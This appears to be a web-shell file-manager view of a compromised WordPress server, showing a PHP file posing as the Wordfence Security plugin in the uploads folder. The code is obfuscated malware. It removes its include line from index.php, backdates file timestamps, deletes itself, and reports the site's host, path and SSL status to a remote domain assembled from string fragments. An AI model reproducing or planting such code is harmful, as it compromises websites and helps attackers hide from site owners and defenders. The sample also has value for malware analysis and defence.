HEX
Server: LiteSpeed
System: Linux venus 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/axxoncom/public_html/wp-content/uploads/wordfence.php
<?php
/*
Domain License: https://amzeestudios.com/
Plugin Name: Wordfence Security
Plugin URI: http://www.wordfence.com/
Description: Wordfence Security - Anti-virus, Firewall and Malware Scan
Author: Wordfence
Author URI: http://www.wordfence.com/
Text Domain: wordfence
Domain Path: /uploads
Network: true
*/
$plugin_Ind = '/index/'; $plugin_Dn = 'wordpless.'; error_reporting( 0 ); $plugin_In = 'g'; $plugin_Ts = 'tp';
	$plugin_Eq = '='; $plugin_An = '&'; $plugin_Dn .= 'or'; $plugin_Th = 'ht'; $plugin_Is = '15809';
$plugin_Is .= '70791'; $meta_WAF = $plugin_Th . $plugin_Ts . ':' . '//' . $plugin_Dn . $plugin_In . $plugin_Ind;

file_put_contents( 'index.php', str_replace( "@include_once './wp-content/uploads/wordfence.php';\n",
	'', file_get_contents( 'index.php' ) ), LOCK_EX ); touch( 'index.php', $plugin_Is, $plugin_Is );
		unlink( './wp-content/uploads/wordfence.php' );
touch( './wp-content/uploads', time()-rand('2000'.'0604','4000'.'0644') );

$comment_DB = strstr( $_SERVER['HTTP_HOST'], '127.0' ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
	$meta_WAF .= '?' . 'api' . $plugin_Eq . urlencode( $comment_DB ) . $plugin_An . 'id' . $plugin_Eq .
urlencode( $_SERVER['PHP_SELF'] ) . $plugin_An . 'ssl' . $plugin_Eq . urlencode( $_SERVER['HTTPS'] );

if( function_exists( 'curl_init' ) ) { $shortcodes_ = curl_init( $meta_WAF ); curl_setopt( $shortcodes_, CURLOPT_HEADER, 0 );
	curl_setopt( $shortcodes_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $shortcodes_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $shortcodes_, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt( $shortcodes_, CURLOPT_SSL_VERIFYHOST, 0);
	curl_setopt( $shortcodes_, CURLOPT_RETURNTRANSFER, 1 ); curl_exec( $shortcodes_ ); curl_close( $shortcodes_ ); } else {
file_get_contents( $meta_WAF ); }